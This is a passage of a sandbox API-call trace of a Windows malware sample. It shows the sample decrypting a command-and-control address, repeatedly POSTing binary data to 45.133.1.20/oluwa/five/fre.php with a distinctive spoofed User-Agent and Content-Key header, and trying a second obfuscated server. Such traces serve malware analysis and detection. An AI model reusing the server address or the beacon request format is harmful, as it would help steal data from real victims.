LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.279] CryptDestroyKey (hKey=0x6ad020) returned 1 [0290.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.281] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0290.281] GetProcessHeap () returned 0x6a0000 [0290.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0290.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.283] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0290.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.285] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0290.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.286] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0290.286] GetProcessHeap () returned 0x6a0000 [0290.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0290.286] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0290.286] GetProcessHeap () returned 0x6a0000 [0290.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0290.286] socket (af=2, type=1, protocol=6) returned 0xac4 [0290.293] connect (s=0xac4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0290.318] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0290.318] GetProcessHeap () returned 0x6a0000 [0290.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0290.318] GetProcessHeap () returned 0x6a0000 [0290.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0290.319] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.320] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0290.320] GetProcessHeap () returned 0x6a0000 [0290.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8170 [0290.320] GetProcessHeap () returned 0x6a0000 [0290.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.321] GetProcessHeap () returned 0x6a0000 [0290.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0290.321] GetProcessHeap () returned 0x6a0000 [0290.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0290.322] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.323] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0290.323] GetProcessHeap () returned 0x6a0000 [0290.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0290.323] GetProcessHeap () returned 0x6a0000 [0290.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.324] send (s=0xac4, buf=0x6bd460*, len=242, flags=0) returned 242 [0290.325] send (s=0xac4, buf=0x6bb998*, len=159, flags=0) returned 159 [0290.325] GetProcessHeap () returned 0x6a0000 [0290.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0290.325] recv (in: s=0xac4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0290.401] GetProcessHeap () returned 0x6a0000 [0290.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0290.402] GetProcessHeap () returned 0x6a0000 [0290.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0290.403] GetProcessHeap () returned 0x6a0000 [0290.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8170 | out: hHeap=0x6a0000) returned 1 [0290.403] GetProcessHeap () returned 0x6a0000 [0290.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0290.404] closesocket (s=0xac4) returned 0 [0290.404] GetProcessHeap () returned 0x6a0000 [0290.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0290.404] GetProcessHeap () returned 0x6a0000 [0290.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.405] GetProcessHeap () returned 0x6a0000 [0290.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0290.405] GetProcessHeap () returned 0x6a0000 [0290.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0290.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xff4) returned 0xac4 [0290.407] Sleep (dwMilliseconds=0xea60) [0290.409] GetProcessHeap () returned 0x6a0000 [0290.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0290.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.410] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0290.427] GetProcessHeap () returned 0x6a0000 [0290.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0290.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.433] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0290.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.448] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.449] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.449] GetProcessHeap () returned 0x6a0000 [0290.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0290.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.451] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0290.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.452] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0290.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.453] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0290.453] GetProcessHeap () returned 0x6a0000 [0290.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.454] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.455] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.456] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.458] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.458] GetProcessHeap () returned 0x6a0000 [0290.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0290.458] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0290.458] GetProcessHeap () returned 0x6a0000 [0290.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0290.459] GetProcessHeap () returned 0x6a0000 [0290.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.459] GetProcessHeap () returned 0x6a0000 [0290.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0290.460] GetProcessHeap () returned 0x6a0000 [0290.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0290.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.472] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0290.515] GetProcessHeap () returned 0x6a0000 [0290.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0290.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.531] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0290.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.534] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.536] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.536] GetProcessHeap () returned 0x6a0000 [0290.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0290.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.538] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0290.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.539] CryptDestroyKey (hKey=0x6ad020) returned 1 [0290.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.541] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0290.541] GetProcessHeap () returned 0x6a0000 [0290.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.546] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0290.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.547] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0290.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.548] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0290.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.549] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0290.549] GetProcessHeap () returned 0x6a0000 [0290.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0290.549] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0290.549] GetProcessHeap () returned 0x6a0000 [0290.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0290.549] socket (af=2, type=1, protocol=6) returned 0xac8 [0290.550] connect (s=0xac8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0290.574] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0290.575] GetProcessHeap () returned 0x6a0000 [0290.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0290.575] GetProcessHeap () returned 0x6a0000 [0290.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0290.576] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.577] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0290.577] GetProcessHeap () returned 0x6a0000 [0290.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d7ff0 [0290.577] GetProcessHeap () returned 0x6a0000 [0290.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.578] GetProcessHeap () returned 0x6a0000 [0290.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0290.578] GetProcessHeap () returned 0x6a0000 [0290.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0290.579] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.579] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0290.580] GetProcessHeap () returned 0x6a0000 [0290.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0290.580] GetProcessHeap () returned 0x6a0000 [0290.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.580] send (s=0xac8, buf=0x6bd460*, len=242, flags=0) returned 242 [0290.581] send (s=0xac8, buf=0x6bb998*, len=159, flags=0) returned 159 [0290.581] GetProcessHeap () returned 0x6a0000 [0290.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0290.581] recv (in: s=0xac8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0290.652] GetProcessHeap () returned 0x6a0000 [0290.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0290.656] GetProcessHeap () returned 0x6a0000 [0290.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0290.656] GetProcessHeap () returned 0x6a0000 [0290.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7ff0 | out: hHeap=0x6a0000) returned 1 [0290.657] GetProcessHeap () returned 0x6a0000 [0290.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0290.657] closesocket (s=0xac8) returned 0 [0290.659] GetProcessHeap () returned 0x6a0000 [0290.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0290.659] GetProcessHeap () returned 0x6a0000 [0290.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.659] GetProcessHeap () returned 0x6a0000 [0290.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0290.659] GetProcessHeap () returned 0x6a0000 [0290.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0290.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12e4) returned 0xac8 [0290.666] Sleep (dwMilliseconds=0xea60) [0290.668] GetProcessHeap () returned 0x6a0000 [0290.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0290.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.669] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.681] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0290.688] GetProcessHeap () returned 0x6a0000 [0290.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0290.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.689] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0290.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.689] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.690] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.690] GetProcessHeap () returned 0x6a0000 [0290.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0290.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.691] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0290.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.692] CryptDestroyKey (hKey=0x6ad020) returned 1 [0290.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.693] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0290.693] GetProcessHeap () returned 0x6a0000 [0290.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.694] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.694] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.695] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.696] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.696] GetProcessHeap () returned 0x6a0000 [0290.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0290.696] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0290.696] GetProcessHeap () returned 0x6a0000 [0290.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0290.697] GetProcessHeap () returned 0x6a0000 [0290.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.697] GetProcessHeap () returned 0x6a0000 [0290.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0290.697] GetProcessHeap () returned 0x6a0000 [0290.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0290.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.702] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0290.708] GetProcessHeap () returned 0x6a0000 [0290.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0290.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.709] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0290.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.710] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.711] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.711] GetProcessHeap () returned 0x6a0000 [0290.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0290.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.712] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0290.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.713] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0290.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.713] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0290.713] GetProcessHeap () returned 0x6a0000 [0290.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.714] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0290.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.715] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0290.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.716] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") 